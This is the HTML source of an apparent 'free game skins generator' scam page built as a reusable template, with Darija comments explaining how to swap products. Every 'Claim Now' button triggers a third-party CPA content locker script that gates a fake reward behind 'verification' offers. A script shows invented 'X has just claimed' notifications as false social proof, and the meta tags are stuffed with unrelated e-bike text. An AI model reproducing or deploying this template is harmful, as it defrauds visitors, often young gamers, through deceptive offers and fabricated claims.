


<!DOCTYPE html>

<!-- ara"-->

<html><head>

  <!-- Google tag (gtag.js) -->
<script async src=""></script>
<script>
</script>

    <title>ara Skins Generator</title>
    <meta name="description" content="Discover the convenience and eco-friendliness of aras. Equipped with an electric motor, rechargeable battery, and a variety of styles to choose from, aras offer an effortless and enjoyable way to travel longer distances, reduce your carbon footprint, and explore new destinations. Learn more about the benefits and regulations of aras today!">
    <meta property="og:title" content="FORT SKIN : The Convenient and Eco-Friendly Way to Travel"/>
<meta property="og:description" content="Discover the convenience and eco-friendliness of aras. Equipped with an electric motor, rechargeable battery, and a variety of styles to choose from, aras offer an effortless and enjoyable way to travel longer distances, reduce your carbon footprint, and explore new destinations. Learn more about the benefits and regulations of aras today!"/>
<meta name="keywords" content="ara, electric bike, battery-powered bicycle, commuting, sustainable transportation, eco-friendly, carbon footprint, pedal assist, power-assisted bike, regulations, road bike, mountain bike, hybrid bike, folding bike, alternative transportation">
<meta name="referrer" content="no-referrer">
<link rel="icon" type="image/x-icon" href="https://i.ibb.co/x5NFjVL/icoon.png" />

<!-- 👇👇👇Analytics Code Here👇👇👇 -->
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-BK14QJKTLR"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-BK14QJKTLR');
</script>



<!-- 👆👆👆Analytics Code Here👆👆👆 -->

    <style>
        .header_blue {
            background: #1565c0;
            padding: 80px 0 20px;
            color: #fff;
            font-size: 48px;
            font-weight: 300;
            margin-bottom: 40px;
        }
        .header_text {
            margin-left: auto;
            margin-right: auto;
            width: 80%;
        }
        body{
            margin:0;
            font-family:Roboto, sans-serif;
            color:#444;
            animation: owel 2s ;
        }
        @keyframes owel {
          
        }
        .unlockBtn:hover{
            box-shadow: 0 3px 6px rgba(0,0,0,.16), 0 3px 6px rgba(0,0,0,.23);
        }
        .unlockBtn {
            background: #2196f3;
            border: none;
            border-radius: 2px;
            box-shadow: 0 1px 3px rgba(0,0,0,.12), 0 1px 2px rgba(0,0,0,.24);
            min-height: 31px;
            min-width: 70px;
            padding: 2px 16px;
            text-align: center;
            text-shadow: none;
            text-transform: uppercase;
            -webkit-transition: all 280ms ease;
            transition: all 280ms ease;
            box-sizing: border-box;
            cursor: pointer;
            -webkit-appearance: none;
            display: inline-block;
            vertical-align: middle;
            font: 500 14px/31px Roboto,sans-serif!important;
            outline: 0!important;
            color:white;
        }
        .content-container{
            width:80%;margin:0 auto;
        }
        @font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Pru33qjShpZSmG3z6VYwnRJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Hgo13k-tfSpn0qi1SFdUfVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/oOeFwZNlrTefzLYmlVV1UBJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}
        body {
    font-family: Arial, Helvetica, sans-serif;
    background: #f19512;
    background-position: center center;
    background-repeat: no-repeat;
    background-size: cover;
    padding: 0%;
    margin: 0%;
    box-sizing: border-box;
  }

  .navbar {
    background-color: #f19512;
    padding: 15px;
    
    text-align: center;
    display: block;
  }

  .navbar-text {
    font-weight: bolder;
    color: #00172f;
    font-size: 22px;
  }

  .main-content {
    scroll-behavior: smooth;
    display: block;
    background-color: #DCDCDC;
    box-shadow: 0 0 5px #00172f;
    margin: 10px;
    padding: 5px;
    border-radius: 5px;
  }

  footer {
    text-align: center;
    background-color: #ffffff50;
    box-shadow: 0 0 5px #00172f;
    padding: 10px;
    cursor: pointer;
  }

  .box-card {
    display: inline-table;
    background-color: #DCDCDC;
    border-radius: 15px;
    box-shadow: 0 0 5px #000000;
    margin: 6px;
    height: 400px;
    width: 250px;
    text-align: center;
    
  }

  .box-card:hover {
    animation: ostamn 4s ease-in-out infinite;
    padding-bottom: 15px;
    height: 15px;
    transform: scale(1.15);
    margin-left: 30px;
    margin-right: 30px;
    margin-bottom: 40px;
    margin-top: 50px;
    background-color: #a9a9a986;
    transition: 0.5s;
}
@keyframes ostamn {
    15% {
        box-shadow: 1px 0 10px #2db9ffe3;  
    }
    35% {
        box-shadow: 1px 0 10px #ff29d4e3;  
    }
    50% {
        box-shadow: 1px 0 10px #ff2d2de3;  
    }
    70% {
        box-shadow: 1px 0 10px #572dffd0;  
    }
    90% {
        box-shadow: 1px 0 10px #eeff04fb;  
    }
    100% {
        box-shadow: 1px 0 10px #58c4fae3;  
    }
}
  a {
    text-decoration: none;
    color: #00172f;
    font-weight: bolder;
   }

  button:hover {
    background-color: #3be76c;
  }
  
  #overlay {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: #00172f;
    filter: alpha(opacity=50);
    -moz-opacity: 0.5;
    -khtml-opacity: 0.5;
    opacity: 0.5;
    z-index: 100;
    display: none;
  }


  .popup-menu a {
    text-decoration: none;
    color: #fff;
    border: #fff solid 2px;
    background: #0077ff;
    margin-left: 210px;
    margin-top: 35px;
    padding-right: 40px;
    padding-left: 40px;
    padding-top: 15px;
    padding-bottom: 15px;
    border-radius: 15px;
    box-shadow: 0 0 10px #8a8a8a;
    text-align: center;
    align-items: center;
    display: flex;
    position: fixed;
  }

  .popup-menu a:hover {
    background: #55d2ff;
    color: #000000;
    padding-right: 215px;
    transition: 0.5s ;
    padding-left: 210px;
    align-items: center;
    text-align: center;
    display: flex;
    align-items: center;
    margin-left: 28px;
    border: 2px #000 solid;
    animation: oosoos 2s infinite;
  }
  @keyframes oosoos {
    25% {
      background: #3dcbbb;
      border: #3dcbbb solid 3px;
    }
    50% {
      background: #4ef7e4;

    }
    75% {
      background: #33fee6;
      border: #33fee6 solid 3px;

    }
    100% {
      background: #15f3d9;

    }
  }

  .popup {
    width: 100%;
    margin: 100px auto;
    display: flex;
    position: fixed;
    z-index: 101;
    text-align: center;
  }

  .popup-menu {
    min-width: auto;
    width: 500px;
    height: 300px;
    font-size: 800;
    margin: 100px auto;
    background: #989898;
    position: relative;
    z-index: 100;
    padding: 10px 35px;
    border-radius: 15px;
    background: linear-gradient(145deg, #e6e6e6, #ffffff);
    box-shadow: 5px 5px 10px #70ffd6,
      -5px -5px 10px #ff00d0ab;
  }

  h1 {
    cursor: pointer;
    font-size: 25px;
    font-weight: bolder;
    font-family: Arial;
  }

  h2 {
    cursor: pointer;
    font-size: 18px;
    font-family: Arial;
    color: #777777;
  }

  h3 {
    cursor: pointer;
    font-size: 35px;
    margin: 10px;
    text-align: center;
    font-weight: bolder;
  }

  .header {
    position: fixed;
    width: 100%;
    padding: 5px;
    border-radius: 0px;
    background: linear-gradient(145deg, #e6e6e6, #ffffff);
    box-shadow: 5px 5px 10px #666666,
      -5px -5px 10px #ffffff;
  }

  .header-text {
    font-size: 25px;
    text-align: center;
    font-weight: bolder;
  }

  .btn-url {
    padding: 10px;
    margin: 10px;
    border-radius: 5px;
    background: #ffffff;
    box-shadow: 5px 5px 10px #666666,
      -5px -5px 10px #ffffff;
    text-decoration: none;
    cursor: pointer;
    width: 260px;
    text-align: center;
    font-weight: bolder;
  }

  .btn-url:hover {
    border-radius: 5px;
    background: #ffffff;
    box-shadow: inset 5px 5px 10px #666666,
      inset -5px -5px 10px #ffffff;
  }

  .notification-bottom-left {
    bottom: 12px;
    left: 12px;
  }

  #notification-container {
    position: fixed;
    z-index: 999999;
    pointer-events: none;
    display: none;
  }

  #notification-container * {
    -moz-box-sizing: border-box;
    -webkit-box-sizing: border-box;
    box-sizing: border-box;
  }

  #notification-container>div {
    position: relative;
    pointer-events: auto;
    overflow: hidden;
    margin: 0 0 6px;
    padding: 15px 15px 15px 60px;
    width: 300px;
    -moz-border-radius: 3px;
    -webkit-border-radius: 3px;
    border-radius: 3px;
    background-position: 15px center;
    background-repeat: no-repeat;
    -moz-box-shadow: 0 0 12px #999;
    -webkit-box-shadow: 0 0 12px #999;
    box-shadow: 0 0 12px #999;
    color: #fff;
    opacity: 0.9;
    -ms-filter: progid:DXImageTransform.Microsoft.Alpha(Opacity=80);
    filter: alpha(opacity=80);
  }

  #notification-container>div.rtl {
    direction: rtl;
    padding: 15px 60px 15px 15px;
    background-position: right 15px center;
  }

  #notification-container>div:hover {
    -moz-box-shadow: 0 0 12px #000;
    -webkit-box-shadow: 0 0 12px #000;
    box-shadow: 0 0 12px #000;
    opacity: 1;
    -ms-filter: progid:DXImageTransform.Microsoft.Alpha(Opacity=100);
    filter: alpha(opacity=100);
    cursor: pointer;
  }

  #notification-container>.notification-success {
    background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAADsSURBVEhLY2AYBfQMgf///3P8+/evAIgvA/FsIF+BavYDDWMBGroaSMMBiE8VC7AZDrIFaMFnii3AZTjUgsUUWUDA8OdAH6iQbQEhw4HyGsPEcKBXBIC4ARhex4G4BsjmweU1soIFaGg/WtoFZRIZdEvIMhxkCCjXIVsATV6gFGACs4Rsw0EGgIIH3QJYJgHSARQZDrWAB+jawzgs+Q2UO49D7jnRSRGoEFRILcdmEMWGI0cm0JJ2QpYA1RDvcmzJEWhABhD/pqrL0S0CWuABKgnRki9lLseS7g2AlqwHWQSKH4oKLrILpRGhEQCw2LiRUIa4lwAAAABJRU5ErkJggg==) !important;
  }

  .notification {
    background-color: #030303;
  }

  .notification-success {
    background-color: #51a351;
  }

  .notification-error {
    background-color: #bd362f;
  }

  .notification-info {
    background-color: #2f96b4;
  }

  .notification-warning {
    background-color: #f89406;
  }

  .notification-progress {
    position: absolute;
    left: 0;
    bottom: 0;
    height: 4px;
    background-color: #000;
    opacity: 0.4;
    -ms-filter: progid:DXImageTransform.Microsoft.Alpha(Opacity=40);
    filter: alpha(opacity=40);
  }

  @media screen and (max-width: 240px) {
    .popup-menu {
      border-radius: 1px;
      min-width: auto;
    width: 1-0px;
    height: 100px;
    } 
    .popup-menu a{
    margin-left: 70px;
    }

    #notification-container>div {
      padding: 8px 8px 8px 60px;
      width: 11em;
    }

    #notification-container>div.rtl {
      padding: 8px 60px 8px 8px;
    }
    
  }

  @media screen and (min-width: 481px) and (max-width: 768px) {
    .popup-menu {
      border-radius: 1px;
      min-width: auto;
    width: 10px;
    height: 100px;
    } 

    #notification-container>div {
      padding: 15px 15px 15px 60px;
      width: 25em;
    }

    #notification-container>div.rtl {
      padding: 15px 60px 15px 15px;
    }
    
}

  .call-now-button div {
    display: flex;
  }

  .call-now-button div p {
    color: #fff;
    display: table;
    padding: 10px;
    border-radius: 21px;
    height: 34px;
    line-height: 14px;
    font-size: 14px;
    margin: 8px 5px 8px 60px;
    text-transform: uppercase;
    font-weight: 400;
    text-align: center;
    box-sizing: content-box;
    text-decoration: none !important;
    box-sizing: border-box;
  }

  .checkmark {
transition: transform .5s;
position: absolute;
top: 0;
left: 0;
height: 250px;
width: 200px;
background-color: #f2f2f2;
border-radius: 5%;
position: relative;
}

.checkmark:hover {
background-color: #ccc;
border-style: solid;
border-width:1px;
border-color: #077d07;

-ms-transform: scale(1.02); 
-webkit-transform: scale(1.02); 
transform: scale(1.02);
}
.checkmarkSelected {
background-color: #ccc;
border-style: solid;
border-width:2px;
border-color: #077d07;

-ms-transform: scale(1.02);
-webkit-transform: scale(1.02); 
transform: scale(1.02);
}

.containerPlat input {
position: absolute;
opacity: 0;
cursor: pointer;
}

button{
padding:5px 10px 5px 10px;
margin:20px;
border-style:solid;
border-width:0px;
border-color:#bababa;
border-radius: 10%;
background-color: #378cdc;
color: rgb(255, 255, 255);
font-size:25px;
font-weight: bold;
font-style: italic;
}

.button_zoom {
border-radius: 15px;
border: #000 solid 2px;
animation: istart 2s ease-in infinite;
}
.button_zoom:hover {
background-color: #0aa40a;
padding-left: 20px;
padding-right: 20px;
padding-top: 7px;
padding-bottom: 7px;
transition: 0.3s;
margin-top: 25px;
border: #ffffff solid 2px;
animation: col43 1.5s ease-in infinite;
}
@keyframes col43 {
    from {
        background-color: #077d07;
    }
    to {
        background-color: #077d07;
    }
}

@keyframes istart {
25% {
background-color: rgba(0, 157, 220, 0.835);
border: 3px solid rgb(255, 255, 255);
}
50% {
background-color: rgba(0, 121, 169, 0.835);
border: 3px solid rgb(0, 0, 0);
}
75% {
background-color: rgba(11, 78, 105, 0.835);
border: 3px solid white;
}
100% {
background-color: rgba(19, 134, 179, 0.835);
border: 3px solid rgb(0, 0, 0);

}
}

button:disabled,
button[disabled]{
border: 1px solid #999999;
background-color: #cccccc;
color: #666666;
}


.X:hover {
width: -20px;
padding-left: 125px;
padding-right: 125px;
padding-top: 15px;
padding-bottom: 15px;
margin-left: 15px;
font-size: 15px;
}

.FFRE {
  
font-size:15px;
border-radius:2px;
padding:4px;
animation: ost 3s infinite ;
}
.FFFRE {
font-size:15px;
border-radius:2px;
padding:4px;
animation: oste 1s infinite ;
}
@keyframes ost {
  0%{
  background-color:#34cb02;
  color:#fff;
  }
  50% {
    background-color:#DCDCDC;
    color:#34cb02;
    border: 2px solid #34cb02;
  }
  75%{
  background-color:#34cb02;
  color:#fff;
  }
}
@keyframes oste {
  25% {
    background-color:#DCDCDC;
  color:#DCDCDC;
  }
  50% {
    background-color:#ff6506;
    color:#fff; 
  }
  75% {
    background-color:#DCDCDC;
    color:#DCDCDC; 
  }
  100% {
    background-color:#ff0000;
  color:#fff;
  }
}
img:hover{
  transform: scale(1.1);
  margin-bottom: 25px;
}



    </style>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="me" href="https://www.blogger.com/profile/08814411442258043780" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
<!-- Google tag (gtag.js) -->
</head>
<body>
<div class="popup" style="display: none;">
    <div class="popup-menu">
      <h1 style="font-size: 25px;font-weight: 800;">How To Claim?<hr></h1>
      <h2>
        1. Choose ara Skin You Want<br><br>
        2. Complete The Step Of Verification<br>
        <span <br><br>
        3. The Skin will be send after Finish 
        All the STEPS. <br><br><span style="color: #077d07;">[Free]</span>
      </h2>
      <br>
      <a href="#" class="X" >OK</a>
      <p></p>
    </div>
  </div>

  <div class="navbar">
   <img src="" alt="">
  </div>


<center>
<img src="https://d266key948fg17.cloudfront.net/uploads/1682010504935bb25a5c439ae70e81ef4ad4d7c50c.gif" alt="icon" style="height: 50px; width: 200px; margin-top: 5px; border-radius: 5px;">
</center>

  <a>
   <div class="slide-nav">
    <div class="prev"></div>
    <div class="next"></div>
  </div>
  <div class="slide-buttons"></div></a>
  
  <center> <div class="judul" style="padding: 20px;">
    <!-- ILA KNTI BARI TMS7 CHI PRODUCT RADI DIR SILECTION L MN 👉👉👉
    👇👇👇👇👇👇👇👇👇👇👇👇👇👇👇👇
    <div class="box-card"><a onclick="CPABuildLock()">

      <button id="bntNext" onclick="CPABuildLock()" class="button_zoom">Claim Now</button>
    </a></div>
    👆👆👆👆👆👆👆👆👆👆👆👆👆👆👆👆

    OU MN B3D ATWRK 3LA CTRL + ;BOTON LI HDA SHIFT LI TWILA FIH WA7D CHRTA
     -->

    <div class="box-card"><a onclick="CPABuildLock()">
      <!-- F STER 693 KAYNA src="1.png" HADIK 1.png BDLHA BCHI IMAGE WLA BLYAN DYAL CHI IMAGE + ILA DRTI IMAGE MN PC 7THA FNFS DOSIER -->
        <img src="https://i.ibb.co/QY8X9H3/1.jpg" alt="icon" style="height: 250px; width: 250px;  border-radius: 15px;">
      <!-- ILA BRITI TBDL SMITE L PRODUCT ATMCHI LSTR 695 ATL9A WA7D 2 TITLE ATL9A WSTHOM WA77D TITLE BDLO-->
      <span style="margin-bottom:5px; color:#484848; font-size:15px;"><!--TITLE-->TRAVIS SCOTT<!--TITLE--></span>
        <br></a><a onclick="CPABuildLock()">
      <!-- ILA BRITI TBDL PRIX L PRODUCT ATMCHI LSTR ATL9A WA7D $ ATBDLO BLI BRITI-->
          <span  style="color:#484848; font-size:20px; margin:10 5px; color:#FF0000; font-size:20px;">V̶b̶u̶c̶k̶s</span>
      <span > | <span class="FFRE" style=" background-color:#34cb02;font-size:15px;border-radius: 2px; padding: 4px; color: #fff ;">FREE</span></span>
    <br>
            <button id="bntNext" onclick="CPABuildLock()" class="button_zoom">Claim Now</button>
    </a></div>
      

    <div class="box-card"><a onclick="CPABuildLock()">
  <!-- F STER 707 KAYNA src="3.webp" HADIK 3.webp BDLHA BCHI IMAGE WLA BLYAN DYAL CHI IMAGE + ILA DRTI IMAGE MN PC 7THA FNFS DOSIER -->
      <img src="https://i.ibb.co/QkH2LML/PHANTOM-MEOWSCLES.jpg" alt="icon" style="height: 250px; width: 250px;  border-radius: 15px;">
      <!-- ILA BRITI TBDL SMITE L PRODUCT ATMCHI LSTR 709 ATL9A WA7D 2 TITLE ATL9A WSTHOM WA77D TITLE BDLO-->
    <span style="margin:0 5px; color:#484848; font-size:15px;">PHANTOM MEOWSCLES</span>
      <br></a><a onclick="CPABuildLock()">
      <!-- ILA BRITI TBDL PRIX L PRODUCT ATMCHI LSTR ATL9A WA7D $ ATBDLO BLI BRITI-->
    <span style="color:#484848; font-size:20px; margin:10 5px; color:#FF0000; font-size:20px;">V̶b̶u̶c̶k̶s</span>
    <span > | <span class="FFFRE" style=" background-color:#ff6506;font-size:15px;border-radius: 2px; padding: 4px; color: #fff ;">Limited</span></span>
    <br>
          <button id="bntNext" onclick="CPABuildLock()" class="button_zoom">Claim Now</button>
  </a></div>


    <div class="box-card"><a onclick="CPABuildLock()">
   <!-- F STER 721 KAYNA src="2.jpg" HADIK 2.jpg BDLHA BCHI IMAGE WLA BLYAN DYAL CHI IMAGE + ILA DRTI IMAGE MN PC 7THA FNFS DOSIER -->
      <img src="https://i.ibb.co/kqpSb9s/icon-4.jpg" alt="icon" style="height: 250px; width: 250px;  border-radius: 15px;">
    <!-- ILA BRITI TBDL SMITE L PRODUCT ATMCHI LSTR 723 ATL9A WA7D 2 TITLE ATL9A WSTHOM WA77D TITLE BDLO-->
    <span style="margin:0 5px; color:#484848; font-size:15px;">SHOTO TODOROKI</span>
      <br></a><a onclick="CPABuildLock()">
        <!-- ILA BRITI TBDL PRIX L PRODUCT ATMCHI LSTR ATL9A WA7D $ ATBDLO BLI BRITI-->
    <span style="color:#484848; font-size:20px; margin:10 5px; color:#FF0000; font-size:20px;">V̶b̶u̶c̶k̶s</span>
    <span > | <span class="FFFRE" style=" background-color:#ff6506;font-size:15px;border-radius: 2px; padding: 4px; color: #fff ;">Limited


    </span></span>
    <br>
          <button id="bntNext" onclick="CPABuildLock()" class="button_zoom">Claim Now</button>
  </a></div>
  
  <div class="box-card"><a onclick="CPABuildLock()">
  <!-- F STER LT7T KAYNA src="4.webp" HADIK 4.webp BDLHA BCHI IMAGE WLA BLYAN DYAL CHI IMAGE + ILA DRTI IMAGE MN PC 7THA FNFS DOSIER -->
    <img src="https://i.ibb.co/6m24rVn/FOCUS.jpg" alt="icon" style="height: 250px; width: 250px;  border-radius: 15px;">
          <!-- ILA BRITI TBDL SMITE L PRODUCT ATMCHI LSTR LI LT7T ATL9A WA7D 2 TITLE ATL9A WSTHOM WA77D TITLE BDLO-->
  <span style="margin:0 5px; color:#484848; font-size:15px;">FOCUS</span>
    <br></a><a onclick="CPABuildLock()">
        <!-- ILA BRITI TBDL PRIX L PRODUCT ATMCHI LSTR ATL9A WA7D $ ATBDLO BLI BRITI-->
  <span style="color:#484848; font-size:20px; margin:10 5px; color:#FF0000; font-size:20px;">V̶b̶u̶c̶k̶s</span>
  <span > | <span class="FFRE" style=" background-color:#34cb02;font-size:15px;border-radius: 2px; padding: 4px; color: #fff ;">FREE</span></span>
  <br>
        <button id="bntNext" onclick="CPABuildLock()" class="button_zoom">Claim Now</button>
  </a></div>


  


<div class="box-card"><a onclick="CPABuildLock()">
  <!-- F STER LT7T KAYNA src="5.jpg" HADIK 5.jpg BDLHA BCHI IMAGE WLA BLYAN DYAL CHI IMAGE + ILA DRTI IMAGE MN PC 7THA FNFS DOSIER -->
  <img src="https://i.ibb.co/2sqRngk/SPARKPLUG.jpg" alt="icon" style="height: 250px; width: 250px;  border-radius: 15px;">
  <!-- ILA BRITI TBDL SMITE L PRODUCT ATMCHI LSTR LT7T ATL9A WA7D 2 TITLE ATL9A WSTHOM WA77D TITLE BDLO-->
<span style="margin:0 5px; color:#484848; font-size:15px;">SPARKPLUG</span>
  <br></a><a onclick="CPABuildLock()">
      <!-- ILA BRITI TBDL PRIX L PRODUCT ATMCHI LSTR ATL9A WA7D $ ATBDLO BLI BRITI-->
<span style="color:#484848; font-size:20px; margin:10 5px; color:#FF0000; font-size:20px;">V̶b̶u̶c̶k̶s</span>
<span > | <span class="FFRE" style=" background-color:#34cb02;font-size:15px;border-radius: 2px; padding: 4px; color: #fff ;">FREE</span></span>
<br>
      <button  id="bntNext" onclick="CPABuildLock()" class="button_zoom">Claim Now</button>
</a></div>

<div class="box-card"><a onclick="CPABuildLock()">
  <!-- F STER LT7T KAYNA src="6.jpg" HADIK 6.jpg BDLHA BCHI IMAGE WLA BLYAN DYAL CHI IMAGE + ILA DRTI IMAGE MN PC 7THA FNFS DOSIER -->
  <img src="https://i.ibb.co/3YTTdLY/PSYCHO-BANDIT.jpg" alt="icon" style="height: 250px; width: 250px;  border-radius: 15px;">
      <!-- ILA BRITI TBDL SMITE L PRODUCT ATMCHI LSTR LT7T ATL9A WA7D 2 TITLE ATL9A WSTHOM WA77D TITLE BDLO-->
<span style="margin:0 5px; color:#484848; font-size:15px;">PSYCHO BANDIT.</span>
  <br></a><a onclick="CPABuildLock()">
      <!-- ILA BRITI TBDL PRIX L PRODUCT ATMCHI LSTR ATL9A WA7D $ ATBDLO BLI BRITI-->
<span style="color:#484848; font-size:20px; margin:10 5px; color:#FF0000; font-size:20px;">V̶b̶u̶c̶k̶s</span>
<span > | <span class="FFRE" style=" background-color:#34cb02;font-size:15px;border-radius: 2px; padding: 4px; color: #fff ;">FREE</span></span>
<br>
      <button id="bntNext" onclick="CPABuildLock()" class="button_zoom">Claim Now</button>
</a></div>

<div class="box-card"><a onclick="CPABuildLock()">
  <!-- F STER LT7T KAYNA src="7.jpg" HADIK 7.jpg BDLHA BCHI IMAGE WLA BLYAN DYAL CHI IMAGE + ILA DRTI IMAGE MN PC 7THA FNFS DOSIER -->
    <img src="https://i.ibb.co/pKgQBhV/icon-1.jpg" alt="icon" style="height: 250px; width: 250px;  border-radius: 15px;">
    <!-- ILA BRITI TBDL SMITE L PRODUCT ATMCHI LSTR LT7T ATL9A WA7D 2 TITLE ATL9A WSTHOM WA77D TITLE BDLO-->
  <span style="margin:0 5px; color:#484848; font-size:15px;">BECKY LYNCH</span>
    <br></a><a onclick="CPABuildLock()">
        <!-- ILA BRITI TBDL PRIX L PRODUCT ATMCHI LSTR ATL9A WA7D $ ATBDLO BLI BRITI-->
  <span style="color:#484848; font-size:20px; margin:10 5px; color:#FF0000; font-size:20px;">V̶b̶u̶c̶k̶s</span>
  <span > | <span class="FFFRE" style=" background-color:#ff6506;font-size:15px;border-radius: 2px; padding: 4px; color: #fff ;">Limited</span></span>
  <br>
        <button id="bntNext" onclick="CPABuildLock()" class="button_zoom">Claim Now</button>
  </a></div>

<div class="box-card"><a onclick="CPABuildLock()">
  <!-- F STER LT7T KAYNA src="8.jpg" HADIK 8.jpg BDLHA BCHI IMAGE WLA BLYAN DYAL CHI IMAGE + ILA DRTI IMAGE MN PC 7THA FNFS DOSIER -->
  <img src="https://i.ibb.co/35XnNHC/8.jpg" alt="icon" style="height: 250px; width: 250px;  border-radius: 15px;">
      <!-- ILA BRITI TBDL SMITE L PRODUCT ATMCHI LSTR LT7T ATL9A WA7D 2 TITLE ATL9A WSTHOM WA77D TITLE BDLO-->
<span style="margin:0 5px; color:#484848; font-size:15px;">GALAXY CROSSFADE</span>
  <br></a><a onclick="CPABuildLock()">
      <!-- ILA BRITI TBDL PRIX L PRODUCT ATMCHI LSTR ATL9A WA7D $ ATBDLO BLI BRITI-->
<span style="color:#484848; font-size:20px; margin:10 5px; color:#FF0000; font-size:20px;">V̶b̶u̶c̶k̶s</span>
<span > | <span class="FFRE" style=" background-color:#34cb02;font-size:15px;border-radius: 2px; padding: 4px; color: #fff ;">FREE</span></span>
<br>
      <button id="bntNext" onclick="CPABuildLock()" class="button_zoom">Claim Now</button>
</a></div>


<div class="navbar">
<div id="notification-container" class="notification-bottom-left" style="display: block;">
    <div class="notification notification-success" aria-live="polite" style="display: block;">
      <div class="notification-title" id="customer-name">Daniel Anderson😍🎉, Has just claimed </div>
      <div class="notification-message" id="customer-phone">😍GALAXY CROSSFADE!</div>
      <div class="notification-message" id="customer-time">3 min ago</div>
    </div>
  </div>
<button id="bntNext" onclick="CPABuildLock()" class="button_zoom">VERIFICATION HERE!!</button></div>

  <footer>
    <span style="color:#484848; font-size:10px;">CONTACT US</span>
    <span style="margin:0 5px; color:#484848;"> | </span>
    <span style="color:#484848; font-size:10px;">TERMS OF SERVICE</span>
    <span style="margin:0 5px; color:#484848;"> | </span>
    <span style="color:#484848;font-size:10px;">PRIVACY POLICY</span>
    <br>
    <span style="color:hsla(0, 0%, 0%, 0.011); font-size:9px;">All trademarks, service marks, trade names, trade dress, product names and logos appearing on the site are the property of their respective owners.</span>
  </footer>
    

<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript">
    var QKNOj_XRl_eAtfnc={"it":2919241,"key":"6ff08"};
    var forward="";
    CPABUILDSETTINGS.onComplete=function(data){
        window.location=forward;
        return false;
    };
</script>
<script src="https://d115fsoldgezur.cloudfront.net/caee30e.js"></script>
<script type="text/javascript">
    $('.showContentLocker').click(function(){
       CPABuildLock();
        return false;
    });
</script>
<script>

</script>
<script type="text/javascript">
    $(function() {
    var overlay = $('<div id="overlay"></div>');
    overlay.show();
    overlay.appendTo(document.body);
    $('.popup').show();
    $('.X').click(function() {
      $('.popup').hide();
      overlay.appendTo(document.body).remove();
      return false;
    });
    $('.x').click(function() {
      $('.popup').hide();
      overlay.appendTo(document.body).remove();
      return false;
    });
  });

var nameArr = [
"John Smith,😀🎉",
"Emily Jones,😀🎉",
"Michael Davis,😀🎉",
"Sophia Lee,😀🎉",
"William Johnson,😀🎉",
"Olivia Brown,😀🎉",
"David Rodriguez,😀🎉",
"Ava Martinez,😀🎉",


  ];
  var phoneArr = [

"😍GALAXY CROSSFADE SKIN",
"😊STREETWEAR YUJI ITADORI SKIN",
"🤩SATORU GOJO SKIN",
"😎TERMINATOR SKIN",
"😏CORE KNIGHT TALUS SKIN",
"😎OPTIMUS PRIME SKIN",
"😏VIKORA SKIN",
"😊TRAVIS SCOTT SKIN",
  ];
  setInterval(function() {
    var randomNumber = Math.floor(Math.random() * nameArr.length);
    $("#customer-name").text(nameArr[randomNumber] + " Has just claimed ");
    $("#customer-phone").text("Claimed " + phoneArr[randomNumber]);
    $("#customer-time").text(randomNumber + 1 + " min ago");
    $("#notification-container").show();
    setTimeout(() => {
      $(".notification-bottom-left").stop().slideToggle("fast");
    }, 4000);
  }, 5000);
</script>
<script>
   

</script>
</body>
</html>
